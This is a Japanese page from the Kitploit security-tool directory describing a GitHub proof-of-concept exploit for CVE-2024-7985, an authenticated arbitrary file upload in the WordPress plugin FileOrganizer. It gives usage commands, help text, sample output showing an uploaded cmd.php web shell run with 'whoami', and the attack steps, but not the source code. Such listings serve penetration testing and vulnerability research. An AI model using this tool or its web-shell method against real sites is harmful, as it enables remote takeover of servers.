Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-7985-PoC — FileOrganizer <= 1.0.9 - 認証済み (Subscriber+) 任意のファイルアップロード | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-7985-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-7985-poc

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - 認証済み (Subscriber+) 任意のファイルアップロード

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-7985-PoC

FileOrganizer <= 1.0.9 - 認証済み (Subscriber+) 任意ファイルアップロード

FileOrganizer エクスプロイト - CVE-2024-7985

📌 概要

CVE-2024-7985 - WordPress プラグイン FileOrganizer <= 1.0.9 には、認証済みの任意ファイルアップロードの脆弱性があり、Subscriber+ 権限を持つ攻撃者が悪意のあるファイルをリモートでアップロードして実行できる可能性があります。この脆弱性は、fileorganizer_ajax_handler 関数におけるファイルタイプ検証の欠如に起因し、リモートコード実行 (RCE) が可能になります。

🚨 このエクスプロイトにより、攻撃者はサーバー上で任意のコマンドを実行できます! 🚨

⚡ 特徴

  • ✅ 攻撃を自動化 - ログイン、nonce 取得、エクスプロイト。
  • ✅ 認証済みユーザー権限を利用してセキュリティチェックを回避。
  • ✅ 自動バージョン検出 - ターゲットが脆弱であることを確認。
  • ✅ カスタムコマンド実行 - ユーザーが任意のコマンドを指定可能。
  • ✅ SSL 検証の問題をシームレスに処理。

🛠️ 必要条件

  • Python 3
  • requests
  • beautifulsoup4

依存関係のインストール:

root@kitploit:~
pip install requests beautifulsoup4

🚀 使用方法

root@kitploit:~
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"

📖 使用方法 - ヘルプ

root@kitploit:~
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]

FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi

options:
  -h, --help           show this help message and exit
  --url URL            Target WordPress site URL
  --username USERNAME  WordPress Username
  --password PASSWORD  WordPress Password
  --cmd CMD            Command to execute in uploaded file

出力例:

root@kitploit:~
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami

🔍 エクスプロイトの動作手順

1️⃣ バージョン確認 - サイトが脆弱かどうかを判定します。 2️⃣ 認証 - WordPress にログインします。 3️⃣ nonce 抽出 - セキュリティトークンを取得します。 4️⃣ ファイルアップロード - 悪意のある PHP スクリプトをアップロードします。 5️⃣ コマンド実行 - ユーザー指定のコマンドを実行します。


📌 免責事項

このスクリプトは教育目的のみで提供されます。作者は、誤用やその結果について一切の責任を負いません。🚨

ツールをダウンロード